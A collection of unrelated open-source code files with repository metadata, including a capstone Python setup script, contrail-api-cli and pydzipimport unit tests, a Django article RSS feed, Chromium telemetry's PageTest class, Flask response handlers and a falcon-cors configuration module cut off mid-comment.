os.system("nmake")
os.chdir("..")
so = "src/build/capstone.dll"
elif SYSTEM == "cygwin":
os.chmod("make.sh", stat.S_IREAD|stat.S_IEXEC)
if is_64bits:
os.system("CAPSTONE_BUILD_CORE_ONLY=yes ./make.sh cygwin-mingw64")
else:
os.system("CAPSTONE_BUILD_CORE_ONLY=yes ./make.sh cygwin-mingw32")
so = "src/capstone.dll"
else: # Unix
os.chmod("make.sh", stat.S_IREAD|stat.S_IEXEC)
os.system("CAPSTONE_BUILD_CORE_ONLY=yes ./make.sh")
if SYSTEM == "darwin":
so = "src/libcapstone.dylib"
else: # Non-OSX
so = "src/libcapstone.so"
os.chdir("..")
shutil.copy(so, "capstone")
def dummy_src():
return []
setup(
provides=['capstone'],
packages=['capstone'],
name=PKG_NAME,
version=VERSION,
author='Nguyen Anh Quynh',
author_email='[email protected]',
description='Capstone disassembly engine',
url='http://www.capstone-engine.org',
classifiers=[
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
requires=['ctypes'],
cmdclass=dict(
build_clib=custom_build_clib,
sdist=custom_sdist,
),
libraries=[(
'capstone', dict(
package='capstone',
sources=dummy_src()
),
)],
zip_safe=False,
include_package_data=True,
package_data={
"capstone": ["*.so", "*.dll", "*.dylib"],
}
)
| {
"content_hash": "bb922c237bd190374e5c77abee1ce34e",
"timestamp": "",
"source": "github",
"line_count": 199,
"max_line_length": 136,
"avg_line_length": 32.5929648241206,
"alnum_prop": 0.5630588960838729,
"repo_name": "fvrmatteo/capstone",
"id": "cf8cd2b0ecf74fb444f39da7893b3065ab228c1b",
"size": "6508",
"binary": false,
"copies": "3",
"ref": "refs/heads/next",
"path": "bindings/python/setup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "13762"
},
{
"name": "C",
"bytes": "1354617"
},
{
"name": "C#",
"bytes": "552697"
},
{
"name": "C++",
"bytes": "11484385"
},
{
"name": "CMake",
"bytes": "14440"
},
{
"name": "Java",
"bytes": "437026"
},
{
"name": "Makefile",
"bytes": "38875"
},
{
"name": "OCaml",
"bytes": "250989"
},
{
"name": "POV-Ray SDL",
"bytes": "11871203"
},
{
"name": "Python",
"bytes": "396342"
},
{
"name": "Ruby",
"bytes": "1193"
},
{
"name": "Shell",
"bytes": "7693"
},
{
"name": "Smalltalk",
"bytes": "302401"
},
{
"name": "Tcl",
"bytes": "1339"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import unittest
try:
import mock
except ImportError:
import unittest.mock as mock
import contrail_api_cli.schema as schema
from contrail_api_cli.context import Context
from contrail_api_cli.resource import Resource, LinkedResources, LinkType, Collection
BASE = "http://localhost:8082"
class TestSchema(unittest.TestCase):
def test_load_non_existing_version(self):
non_existing_version = "0"
with self.assertRaises(schema.SchemaVersionNotAvailable):
schema.create_schema_from_version(non_existing_version)
def test_create_all_schema_versions(self):
for v in schema.list_available_schema_version():
schema.create_schema_from_version(v)
class TestLinkResource(unittest.TestCase):
def setUp(self):
Context().schema = schema.create_schema_from_version('2.21')
def tearDown(self):
Context().schema = None
@mock.patch('contrail_api_cli.resource.Context.session')
def test_attr_transformations(self, mock_session):
lr = LinkedResources(LinkType.REF,
Resource('virtual-machine-interface', fq_name='foo'))
self.assertEqual(lr._type_to_attr('virtual-machine'), 'virtual_machine_refs')
self.assertEqual(lr._type_to_attr('virtual_machine'), 'virtual_machine_refs')
self.assertEqual(lr._attr_to_type('virtual_machine'), 'virtual-machine')
self.assertEqual(lr._attr_to_type('virtual_machine_refs'), 'virtual-machine')
self.assertEqual(lr._attr_to_type('virtual_machine_back_refs'), 'virtual-machine-back')
lr = LinkedResources(LinkType.BACK_REF,
Resource('virtual-machine-interface', fq_name='foo'))
self.assertEqual(lr._type_to_attr('virtual-machine'), 'virtual_machine_back_refs')
self.assertEqual(lr._attr_to_type('virtual_machine_back_refs'), 'virtual-machine')
self.assertEqual(lr._attr_to_type('virtual_machine_refs'), 'virtual-machine-refs')
lr = LinkedResources(LinkType.CHILDREN,
Resource('virtual-machine-interface', fq_name='foo'))
self.assertEqual(lr._type_to_attr('virtual-machine'), 'virtual_machines')
self.assertEqual(lr._attr_to_type('virtual_machines'), 'virtual-machine')
self.assertEqual(lr._attr_to_type('virtual_machine_refs'), 'virtual-machine-ref')
@mock.patch('contrail_api_cli.resource.Context.session')
def test_schema_refs(self, mock_session):
mock_session.get_json.return_value = {
"virtual-machine-interface": {
"href": BASE + "/virtual-machine-interface/ec1afeaa-8930-43b0-a60a-939f23a50724",
"uuid": "ec1afeaa-8930-43b0-a60a-939f23a50724",
"attr": None,
"fq_name": [
"virtual-machine-interface",
"ec1afeaa-8930-43b0-a60a-939f23a50724"
],
"bar_refs": [1, 2, 3],
"virtual_machine_refs": [
{
"href": BASE + "/virtual-machine/15315402-8a21-4116-aeaa-b6a77dceb191",
"uuid": "15315402-8a21-4116-aeaa-b6a77dceb191",
"to": [
"bar",
"15315402-8a21-4116-aeaa-b6a77dceb191"
]
}
]
}
}
vmi = Resource('virtual-machine-interface', uuid='ec1afeaa-8930-43b0-a60a-939f23a50724', fetch=True)
self.assertEqual(len(vmi.refs.virtual_machine), 1)
self.assertTrue(type(vmi.refs.virtual_machine[0]) == Resource)
self.assertEqual(len(vmi.refs.bar), 0)
self.assertEqual([r.uuid for r in vmi.refs], ['15315402-8a21-4116-aeaa-b6a77dceb191'])
@mock.patch('contrail_api_cli.resource.Context.session')
def test_schema_children(self, mock_session):
mock_session.get_json.side_effect = [
{
"project": {
"href": BASE + "/project/ec1afeaa-8930-43b0-a60a-939f23a50724",
"uuid": "ec1afeaa-8930-43b0-a60a-939f23a50724",
"attr": None,
"fq_name": [
"project",
"ec1afeaa-8930-43b0-a60a-939f23a50724"
],
"virtual_networks": [
{
"href": BASE + "/virtual-network/15315402-8a21-4116-aeaa-b6a77dceb191",
"uuid": "15315402-8a21-4116-aeaa-b6a77dceb191",
"to": [
"virtual-network",
"15315402-8a21-4116-aeaa-b6a77dceb191"
]
}
]
}
},
{
'virtual-network': []
}
]
vmi = Resource('project', uuid='ec1afeaa-8930-43b0-a60a-939f23a50724', fetch=True)
self.assertEqual(len(vmi.children.virtual_network), 1)
self.assertEqual(type(vmi.children.virtual_network), Collection)
self.assertTrue(vmi.children.virtual_network.type, 'virtual-network')
self.assertTrue(vmi.children.virtual_network.parent_uuid, vmi.uuid)
vmi.children.virtual_network.fetch()
mock_session.get_json.assert_called_with(vmi.children.virtual_network.href, parent_id=vmi.uuid)
@mock.patch('contrail_api_cli.resource.Context.session')
def test_schema_back_refs(self, mock_session):
mock_session.get_json.side_effect = [
{
"virtual-network": {
"href": BASE + "/virtual-network/ec1afeaa-8930-43b0-a60a-939f23a50724",
"uuid": "ec1afeaa-8930-43b0-a60a-939f23a50724",
"attr": None,
"fq_name": [
"virtual-network",
"ec1afeaa-8930-43b0-a60a-939f23a50724"
],
"instance_ip_back_refs": [
{
"href": BASE + "/instance-ip/15315402-8a21-4116-aeaa-b6a77dceb191",
"uuid": "15315402-8a21-4116-aeaa-b6a77dceb191",
"to": [
"instance-ip",
"15315402-8a21-4116-aeaa-b6a77dceb191"
]
}
]
}
},
{
'instance-ip': []
}
]
vn = Resource('virtual-network', uuid='ec1afeaa-8930-43b0-a60a-939f23a50724', fetch=True)
self.assertEqual(len(vn.back_refs.instance_ip), 1)
self.assertEqual(type(vn.back_refs.instance_ip), Collection)
self.assertTrue(vn.back_refs.instance_ip.type, 'instance-ip')
self.assertTrue(vn.back_refs.instance_ip.back_refs_uuid, vn.uuid)
vn.back_refs.instance_ip.fetch()
mock_session.get_json.assert_called_with(vn.back_refs.instance_ip.href, back_ref_id=vn.uuid)
def test_require_schema(self):
@schema.require_schema(version='> 3')
def test_gt():
pass
@schema.require_schema(version='< 3')
def test_lt():
pass
@schema.require_schema(version='2.21')
def test_eq():
pass
with self.assertRaises(schema.SchemaError):
test_gt()
test_lt()
test_eq()
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "217cd190b58b461fd2cb03a8a9094d62",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 108,
"avg_line_length": 42.027624309392266,
"alnum_prop": 0.546601814118575,
"repo_name": "eonpatapon/contrail-api-cli",
"id": "ba0105cdad80c6390ba5e5f077f3588d98610d77",
"size": "7631",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrail_api_cli/tests/test_schema.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "208774"
}
],
"symlink_target": ""
} |
from django.contrib.syndication.views import Feed
from articles.models import ArticleTranslation
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import get_language
from django.conf import settings
import datetime
class ArticleFeed(Feed):
title = hasattr(settings, 'ARTICLES_RSS_TITLE') and settings.ARTICLES_RSS_TITLE or _("RSS Title")
description = hasattr(settings, 'ARTICLES_RSS_DESCRIPTION') and settings.ARTICLES_RSS_DESCRIPTION or ""
# hard coded to prevent circular imports
link = '/articles/'
def get_object(self, request, language):
return ArticleTranslation.objects.filter(published=True, publication_date__lte=datetime.datetime.now(), language=language or get_language()[:2])
def items(self, obj):
return obj.order_by('-publication_date')[:10]
def item_title(self, item):
return item.title
def item_description(self, item):
return item.content
def item_pubdate(self, item):
return datetime.datetime.combine(item.publication_date, datetime.time()) | {
"content_hash": "b29861bb27dae89e40b59ace73be38d6",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 150,
"avg_line_length": 39.142857142857146,
"alnum_prop": 0.7235401459854015,
"repo_name": "platypus-creation/django-articles",
"id": "577e1ce11e54f5bde151a77558ad7af8c0545c5a",
"size": "1096",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "articles/feeds.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "113"
},
{
"name": "Perl",
"bytes": "1085"
},
{
"name": "Python",
"bytes": "64733"
}
],
"symlink_target": ""
} |
"""Tests for `pydzipimport`."""
#-----------------------------------------------------------------------------
# Copyright (C) 2012 Bradley Froehle <[email protected]>
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
import imp
import os
import sys
import unittest
import tempfile
import zipfile
from distutils.command.build_ext import build_ext
from distutils.core import Distribution
from distutils.extension import Extension
import pydzipimport
# The filename extension for compiled extension modules.
SO_EXT = [suffix[0] for suffix in imp.get_suffixes()
if suffix[2] == imp.C_EXTENSION][0]
def prepare_sample_zip(file):
"""Create a zipfile which contains the `sample` package.
On completion, the contents of `file` will be::
sample/
sample/one.py
sample/__init__.<SO_EXT>
sample/two.<SO_EXT>
The extension modules are compiled in a temporary directory.
"""
src = os.path.join(os.path.dirname(__file__), 'sample')
zf = zipfile.ZipFile(file, mode='w')
# Is there an easier way to make an empty directory in the zipfile???
with tempfile.TemporaryDirectory() as td:
zf.write(td, 'sample')
zf.write(os.path.join(src, 'one.py'),
os.path.join('sample', 'one.py'))
with tempfile.TemporaryDirectory() as td:
## Build the extension modules.
## This is more or less the same as running::
## python setup.py build_ext --force
## for the following `setup.py` script::
#
# from distutils.core import setup
# from distutils.extension import Extension
#
# setup(
# packages = ['test_pydzipimport'],
# ext_modules = [
# Extension("sample.__init__", ["sample/__init__.c"]),
# Extension("sample.two", ["sample/two.c"]),
# ],
# )
b = build_ext(Distribution())
b.force = True
b.finalize_options()
b.extensions = [
Extension('sample.__init__', [os.path.join(src, '__init__.c')]),
Extension('sample.two', [os.path.join(src, 'two.c')]),
]
b.build_temp = td
b.build_lib = td
b.run()
zf.write(b.get_ext_fullpath('sample.__init__'),
os.path.join('sample', '__init__' + SO_EXT))
zf.write(b.get_ext_fullpath('sample.two'),
os.path.join('sample', 'two' + SO_EXT))
zf.close()
class TestPydZipImport(unittest.TestCase):
"""Test PydZipImport class."""
@classmethod
def setUpClass(cls):
cls.zf = os.path.join(os.path.dirname(__file__), 'sample.zip')
prepare_sample_zip(cls.zf)
def setUp(self):
self._old_sys_path = list(sys.path)
# Remove troublesome entries of sys.path:
for p in ('', os.path.dirname(__file__)):
if p in sys.path:
sys.path.remove(p)
pydzipimport.install()
def tearDown(self):
sys.path = self._old_sys_path
pydzipimport.uninstall()
def test_import_package(self):
"""Test importing a package in a zipfile."""
sys.path.insert(0, self.zf)
base = os.path.join(self.zf, 'sample')
# Test package (sample/__init__.<SO_EXT>):
import sample as s
if not hasattr(s, '__file__'):
self.fail('Unexpected implicit namespace package: %s' % s.__path__)
self.assertEqual(s.data, 'sample.__init__')
self.assertIsInstance(s.__loader__,
pydzipimport.TemporaryExtensionFileLoader)
self.assertEqual(s.__package__, 'sample')
self.assertEqual(s.__path__, [base])
self.assertEqual(s.__file__, os.path.join(base, '__init__' + SO_EXT))
# print(s.__loader__.data.name)
# Test source module (sample/one.py):
import sample.one
self.assertEqual(s.one.data, 'sample.one')
self.assertEqual(s.one.__package__, 'sample')
self.assertFalse(hasattr(s.one, '__path__'))
self.assertEqual(s.one.__file__, os.path.join(base, 'one.py'))
# Test extension module (sample/two.<SO_EXT>):
import sample.two
self.assertEqual(s.two.data, 'sample.two')
self.assertIsInstance(s.two.__loader__,
pydzipimport.TemporaryExtensionFileLoader)
self.assertEqual(s.two.__package__, 'sample')
self.assertFalse(hasattr(s.two, '__path__'))
self.assertEqual(s.two.__file__, os.path.join(base, 'two' + SO_EXT))
# print(s.two.__loader__.data.name)
def test_import_source_module(self):
"""Test importing a source module in a zipfile."""
base = os.path.join(self.zf, 'sample')
sys.path.insert(0, base)
import one
self.assertEqual(one.data, 'sample.one')
self.assertFalse(one.__package__)
self.assertEqual(one.__file__, os.path.join(base, 'one.py'))
def test_import_extension_module(self):
"""Test importing an extension module in a zipfile."""
base = os.path.join(self.zf, 'sample')
sys.path.insert(0, base)
import two
self.assertEqual(two.data, 'sample.two')
self.assertIsInstance(two.__loader__,
pydzipimport.TemporaryExtensionFileLoader)
self.assertFalse(two.__package__)
self.assertEqual(two.__file__, os.path.join(base, 'two' + SO_EXT))
# print(two.__loader__.data.name)
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "103592dc1d4e19567768c05334052f84",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 79,
"avg_line_length": 33.432748538011694,
"alnum_prop": 0.5660311352107749,
"repo_name": "bfroehle/pydzipimport",
"id": "f8992a482d23de3a90915085ec3b1007c293a3ad",
"size": "5717",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_pydzipimport.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "100643"
},
{
"name": "Python",
"bytes": "12828"
}
],
"symlink_target": ""
} |
import logging
from telemetry.core import exceptions
from telemetry.page import action_runner as action_runner_module
class TestNotSupportedOnPlatformError(Exception):
"""PageTest Exception raised when a required feature is unavailable.
The feature required to run the test could be part of the platform,
hardware configuration, or browser.
"""
class MultiTabTestAppCrashError(Exception):
"""PageTest Exception raised after browser or tab crash for multi-tab tests.
Used to abort the test rather than try to recover from an unknown state.
"""
class Failure(Exception):
"""PageTest Exception raised when an undesired but designed-for problem."""
class MeasurementFailure(Failure):
"""PageTest Exception raised when an undesired but designed-for problem."""
class PageTest(object):
"""A class styled on unittest.TestCase for creating page-specific tests.
Test should override ValidateAndMeasurePage to perform test
validation and page measurement as necessary.
class BodyChildElementMeasurement(PageTest):
def ValidateAndMeasurePage(self, page, tab, results):
body_child_count = tab.EvaluateJavaScript(
'document.body.children.length')
results.AddValue(scalar.ScalarValue(
page, 'body_children', 'count', body_child_count))
Args:
discard_first_run: Discard the first run of this page. This is
usually used with page_repeat and pageset_repeat options.
"""
def __init__(self,
needs_browser_restart_after_each_page=False,
discard_first_result=False,
clear_cache_before_each_run=False):
super(PageTest, self).__init__()
self.options = None
self._needs_browser_restart_after_each_page = (
needs_browser_restart_after_each_page)
self._discard_first_result = discard_first_result
self._clear_cache_before_each_run = clear_cache_before_each_run
self._close_tabs_before_run = True
@property
def is_multi_tab_test(self):
"""Returns True if the test opens multiple tabs.
If the test overrides TabForPage, it is deemed a multi-tab test.
Multi-tab tests do not retry after tab or browser crashes, whereas,
single-tab tests too. That is because the state of multi-tab tests
(e.g., how many tabs are open, etc.) is unknown after crashes.
"""
return self.TabForPage.__func__ is not PageTest.TabForPage.__func__
@property
def discard_first_result(self):
"""When set to True, the first run of the test is discarded. This is
useful for cases where it's desirable to have some test resource cached so
the first run of the test can warm things up. """
return self._discard_first_result
@discard_first_result.setter
def discard_first_result(self, discard):
self._discard_first_result = discard
@property
def clear_cache_before_each_run(self):
"""When set to True, the browser's disk and memory cache will be cleared
before each run."""
return self._clear_cache_before_each_run
@property
def close_tabs_before_run(self):
"""When set to True, all tabs are closed before running the test for the
first time."""
return self._close_tabs_before_run
@close_tabs_before_run.setter
def close_tabs_before_run(self, close_tabs):
self._close_tabs_before_run = close_tabs
def RestartBrowserBeforeEachPage(self):
""" Should the browser be restarted for the page?
This returns true if the test needs to unconditionally restart the
browser for each page. It may be called before the browser is started.
"""
return self._needs_browser_restart_after_each_page
def StopBrowserAfterPage(self, browser, page): # pylint: disable=W0613
"""Should the browser be stopped after the page is run?
This is called after a page is run to decide whether the browser needs to
be stopped to clean up its state. If it is stopped, then it will be
restarted to run the next page.
A test that overrides this can look at both the page and the browser to
decide whether it needs to stop the browser.
"""
return False
def CustomizeBrowserOptions(self, options):
"""Override to add test-specific options to the BrowserOptions object"""
def WillStartBrowser(self, platform):
"""Override to manipulate the browser environment before it launches."""
def DidStartBrowser(self, browser):
"""Override to customize the browser right after it has launched."""
def SetOptions(self, options):
"""Sets the BrowserFinderOptions instance to use."""
self.options = options
def WillNavigateToPage(self, page, tab):
"""Override to do operations before the page is navigated, notably Telemetry
will already have performed the following operations on the browser before
calling this function:
* Ensure only one tab is open.
* Call WaitForDocumentReadyStateToComplete on the tab."""
def DidNavigateToPage(self, page, tab):
"""Override to do operations right after the page is navigated and after
all waiting for completion has occurred."""
def DidRunPage(self, platform):
"""Called after the test run method was run, even if it failed."""
def TabForPage(self, page, browser): # pylint: disable=W0613
"""Override to select a different tab for the page. For instance, to
create a new tab for every page, return browser.tabs.New()."""
try:
return browser.tabs[0]
# The tab may have gone away in some case, so we create a new tab and retry
# (See crbug.com/496280)
except exceptions.DevtoolsTargetCrashException as e:
logging.error('Tab may have crashed: %s' % str(e))
browser.tabs.New()
# See comment in shared_page_state.WillRunStory for why this waiting
# is needed.
browser.tabs[0].WaitForDocumentReadyStateToBeComplete()
return browser.tabs[0]
def ValidateAndMeasurePage(self, page, tab, results):
"""Override to check test assertions and perform measurement.
When adding measurement results, call results.AddValue(...) for
each result. Raise an exception or add a failure.FailureValue on
failure. page_test.py also provides several base exception classes
to use.
Prefer metric value names that are in accordance with python
variable style. e.g., metric_name. The name 'url' must not be used.
Put together:
def ValidateAndMeasurePage(self, page, tab, results):
res = tab.EvaluateJavaScript('2+2')
if res != 4:
raise Exception('Oh, wow.')
results.AddValue(scalar.ScalarValue(
page, 'two_plus_two', 'count', res))
Args:
page: A telemetry.page.Page instance.
tab: A telemetry.core.Tab instance.
results: A telemetry.results.PageTestResults instance.
"""
raise NotImplementedError
# Deprecated: do not use this hook. (crbug.com/470147)
def RunNavigateSteps(self, page, tab):
"""Navigates the tab to the page URL attribute.
Runs the 'navigate_steps' page attribute as a compound action.
"""
action_runner = action_runner_module.ActionRunner(
tab, skip_waits=page.skip_waits)
page.RunNavigateSteps(action_runner)
| {
"content_hash": "8ef2f9dd98140de1126446c1c09e396b",
"timestamp": "",
"source": "github",
"line_count": 195,
"max_line_length": 80,
"avg_line_length": 36.85128205128205,
"alnum_prop": 0.7086000556637907,
"repo_name": "Pluto-tv/chromium-crosswalk",
"id": "575c08c86a7c78c908e9ab9d3789f578a4c5ea67",
"size": "7349",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tools/telemetry/telemetry/page/page_test.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AppleScript",
"bytes": "6973"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "37073"
},
{
"name": "Batchfile",
"bytes": "8451"
},
{
"name": "C",
"bytes": "9548418"
},
{
"name": "C++",
"bytes": "244899104"
},
{
"name": "CSS",
"bytes": "946931"
},
{
"name": "DM",
"bytes": "60"
},
{
"name": "Groff",
"bytes": "2494"
},
{
"name": "HTML",
"bytes": "27337866"
},
{
"name": "Java",
"bytes": "15149798"
},
{
"name": "JavaScript",
"bytes": "20716348"
},
{
"name": "Makefile",
"bytes": "70864"
},
{
"name": "Objective-C",
"bytes": "1764480"
},
{
"name": "Objective-C++",
"bytes": "10068706"
},
{
"name": "PHP",
"bytes": "97817"
},
{
"name": "PLpgSQL",
"bytes": "178732"
},
{
"name": "Perl",
"bytes": "63937"
},
{
"name": "Protocol Buffer",
"bytes": "486852"
},
{
"name": "Python",
"bytes": "8518224"
},
{
"name": "Shell",
"bytes": "486537"
},
{
"name": "Standard ML",
"bytes": "5106"
},
{
"name": "XSLT",
"bytes": "418"
},
{
"name": "nesC",
"bytes": "18347"
}
],
"symlink_target": ""
} |
""".
This is info messages file, contains all the info messages for the service
"""
from flask import jsonify
from core.handlers.common_handlers import base_response, base_response_token
from core.handlers.common_handlers import base_response_user
from core.messages import successful_messages as info
from flask_api import status
def correct_login(auth_token):
"""Return a json response with the description and http status 200."""
return base_response_token(info.SUCCESS_HANDLER,
info.USER_LOGIN_OK,
status.HTTP_200_OK,
auth_token)
def correct_register(auth_token):
"""Return a json response with the description and http status 201."""
return base_response_token(info.SUCCESS_HANDLER,
info.USER_REGISTER_OK,
status.HTTP_201_CREATED,
auth_token)
def correct_logout():
"""Return a json response with the description and http status 200."""
return base_response(info.SUCCESS_HANDLER,
info.USER_LOGOUT_OK,
status.HTTP_200_OK)
def user_status(user):
"""Return a json response with the description and http status 200."""
return base_response_user(info.SUCCESS_HANDLER,
status.HTTP_200_OK,
user)
def user_created(email):
"""Return a json response with the description and http status 201."""
return base_response(info.SUCCESS_HANDLER,
email + info.USER_ADD_OK,
status.HTTP_201_CREATED)
def user_updated():
"""Return a json response with the description and http status 200."""
return base_response(info.SUCCESS_HANDLER,
info.USER_UPDATE_OK,
status.HTTP_200_OK)
def user_read(user):
"""Return a json response with the description and http status 200."""
return base_response_user(info.SUCCESS_HANDLER,
status.HTTP_202_ACCEPTED,
user)
def user_read_all(users):
"""Return a json response with the users list and sucess status."""
users_list = []
for user in users.items:
user_object = {
'id': user.id,
'username': user.username,
'email': user.email,
'registered_on': user.registered_on,
'is_active': user.is_active,
'is_admin': user.is_admin
}
users_list.append(user_object)
response_object = {
'status': 'success',
'data': {
'users': users_list
}
}
return jsonify(response_object), status.HTTP_200_OK
| {
"content_hash": "4a189d3aaa2cb7a772ed49ca03d82061",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 76,
"avg_line_length": 33.13095238095238,
"alnum_prop": 0.5749191519942508,
"repo_name": "pcu4dros/pandora-core",
"id": "28f423c23c1c62803ab657553e422c8896c1d130",
"size": "2783",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/handlers/info_handlers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "39286"
},
{
"name": "CSS",
"bytes": "14990"
},
{
"name": "HTML",
"bytes": "45691"
},
{
"name": "JavaScript",
"bytes": "2777334"
},
{
"name": "Mako",
"bytes": "8969"
},
{
"name": "Python",
"bytes": "10773740"
},
{
"name": "Shell",
"bytes": "3310"
}
],
"symlink_target": ""
} |
"""
This module implements the configuration for handling CORS requests.
"""
import logging
import re
try:
from falcon import HTTP_METHODS
except ImportError:
from falcon import status_codes as HTTP_METHODS
from .middleware import CORSMiddleware
from .log import get_default_logger
class CORS(object):
"""
Initialize a CORS object, passing in configuration options.
All of the configuration settings are optional, however if none
of them are specified the default configuration will simply
deny all CORS requests. You can pass this to
:py:class:`~falcon.api.API` for a global configuration.
After enabling globally, you can override the settings for a
particular resource by setting the 'cors' attribute on it to
an instance of this class.
Args:
logger(:py:meth:`logging.Logger`, optional):
Specifies the logger to use. A basic logger and StreamHandler
will be configure for you if none is provided.
allow_all_origins(bool, optional): Specifies whether CORS
should allow requests from all origins. Default is ``False``.
allow_origins_list(list, optional): A list of
origins that are allowed to make CORS requests. Default is empty.
allow_origins_regex(str, optional): A string containing
a Python regular expression that matches origins which
are allowed to make CORS requests. Default is ``None``.
allow_all_headers(bool, optional): If ``True``, when the server is
responding to a preflight request it will approve any headers
requested by the client via the Access-Control-Request-Headers
header, setting each requested header in the
value of the Access-Control-Allow-Headers header in the response.
Default is ``False``.
allow_headers_list(list, optional): A list of headers which are
allowed values for the Access-Control-Allow-Headers header
in response to a preflight request. When the server is
responding to a preflight request, it will check each header
requested by the client in the Access-Control-Request-Headers
header to see if it exists in this list. If it does, it
will be included in the Access-Control-Allow-Headers header
in the response to the preflight request.
Default is empty.
allow_headers_regex(str, optional): A string containing a Python
regular expression that matches headers that should be
allowed in response to a preflight request. If this is set,
when a preflight request is received by the server, it will
try to match each header requested by the client via the
Access-Control-Request-Headers header of the request. If
the requested header is matched by this regex, it will be
included in the value of the Access-Control-Allow-Headers
header of the response.
expose_headers_list(list, optional): A list of headers that
should be sent as values to the Access-Control-Expose-Headers
header in response to simple or actual requests.
allow_all_methods(bool, optional): Specifies whether all methods
are allowed via CORS requests. Default is ``False``.
allow_methods_list(list, optional): A list of methods which are
allowed via CORS requests. These should be values from
``falcon.HTTP_METHODS``, which are strings like 'GET' and 'PATCH'.
Default is empty.
allow_credentials_all_origins(bool, optional): Where or not the
Access-Control-Allow-Credentials should be set to True
and set on all responses. Default is ``False``.
allow_credentials_origins_list(list, optional): A list of
origins for which the Access-Control-Allow-Credentials
header should be set to True and included with all
responses. Default is empty.
allow_credentials_origins_regex(string, optional): A string
containing a Python regular expression matching origins
for which the Access-Control-Allow-Credentials header
should be set to True and included in all responses.
Default is ``None``.
max_age(int, optional): If set to an integer, this value
will be used as the value of the Access-Control-Max-Age
header in response to preflight requests. This is
in seconds the maximum amount of time a client may cache
responses to preflight requests.
Default is ``None`` (no header sent).
Note:
The arguments above are inclusie, meaning a header, origin, or method
will only be disallowed if it doesn't match ANY specification.
First the allow_all directive is checked, then the list directive,
then the regex directive if applicable, then list by method if applicable,
and lastly regex by method if applicable. For instance, this means if
you specify 'Auth-Key' in allow_headers_list, it will be allowed for all
methods regardless of the values in header_list_By_method.
Note:
Headers are converted to lower-case for you.
Methods are converted to upper-case for you.
Take note of this if you are writing regular expressions.
Note:
The allow_headers_* settings relate to the Access-Control-Allow-Headers
header which is only sent in response to pre-flight requests.
This is different from the Access-Control-Expose-Headers header which
is set via the expose_headers_list setting and is sent only in response
to basic or actual requests.
Warning:
Exercise caution when using the regex enabled settings. It is very
easy to misunderstand Python regex syntax and accidentally
introduce an unintentionally allowed origin or other vulnerability
into your application.
"""
def __init__(self, **cors_config):
default_cors_config = {
'logger': get_default_logger(),
'log_level':None,
'allow_all_origins': False,
'allow_origins_list': [],
'allow_origins_regex': None,
'allow_all_headers': False,
'allow_headers_list': [],
'allow_headers_regex': None,
'expose_headers_list': [],
'allow_all_methods': False,
'allow_methods_list': [],
'allow_credentials_all_origins': False,
'allow_credentials_origins_list': [],
'allow_credentials_origins_regex': None,
'max_age': None
}
for cors_setting, setting_value in default_cors_config.items():
cors_config.setdefault(cors_setting, setting_value)
unknown_settings = list(set(cors_config.keys()) -
set(default_cors_config.keys()))
if unknown_settings:
raise ValueError(
'Unknown CORS settings: {0}'.format(unknown_settings))
self.logger = cors_config["logger"]
if cors_config["log_level"] is not None:
level = logging.getLevelName(cors_config["log_level"])
self.logger.setLevel(level)
unknown_methods = list(set(
cors_config['allow_methods_list']) - set(HTTP_METHODS))
if unknown_methods:
raise ValueError(
'Unknown methods specified for '
'allow_methods_list: {0}'.format(unknown_methods))
self._compile_keys(
cors_config,
[
'allow_origins_regex', 'allow_headers_regex',
'allow_credentials_origins_regex'
])
cors_config['allow_methods_list'] = [
method.upper() for method in cors_config['allow_methods_list']
]
for header_list_key in ['allow_headers_list', 'expose_headers_list']:
cors_config[header_list_key] = [
header.lower() for header in cors_config[header_list_key]
]
# We need to detect if we support credentials, if we do
# we cannot set Access-Control-Allow-Origin to *
self.supports_credentials = False
for credentials_key in [
'allow_credentials_all_origins',
'allow_credentials_origins_list',
'allow_credentials_origins_regex'
]:
if cors_config[credentials_key]:
self.supports_credentials = True
self.logger.debug(
"supports_credentials: {0}".format(
self.supports_credentials
)
)
# Detect if we need to send 'Vary: Origin' header
# This needs to be set if any decisions about which headers to send
# are being made based on the Origin header the client sends
self.origins_vary = False
if cors_config['allow_all_origins']:
for vary_origin_config_key in [
'allow_credentials_origins_list',
'allow_credentials_origins_regex'
]:
if cors_config[vary_origin_config_key]:
self.origins_vary = True
self.logger.debug(
"origins_vary {0}".format(
self.origins_vary
)
)
self._cors_config = cors_config
def _compile_keys(self, settings_dict, keys):
for key in keys:
if settings_dict[key] is not None:
settings_dict[key] = re.compile(settings_dict[key])
@property
def middleware(self):
"""A property which returns a CORSMiddleware instance"""
return CORSMiddleware(self)
def process(self, req, resp, resource):
# Comments in this section will refer to sections of the W3C
# specification for CORS, most notably 6.1.X and 6.2.X which are
# list of steps a server should take when responding to CORS
# requests http://www.w3.org/TR/cors/# resource-processing-model
# According to the spec, it is OK for steps to take place out of
# order, as long as the end result is indistinguishable from the
# reference algorithm specified in the W3C document. (Section 2)
# For efficiency and code structure, some steps may take place
# out of order, although we try our best to stick to the order
# of steps specified in Section 6.1 and 6.2
# We must always set 'Vary: Origin' even if the Origin header is not set,
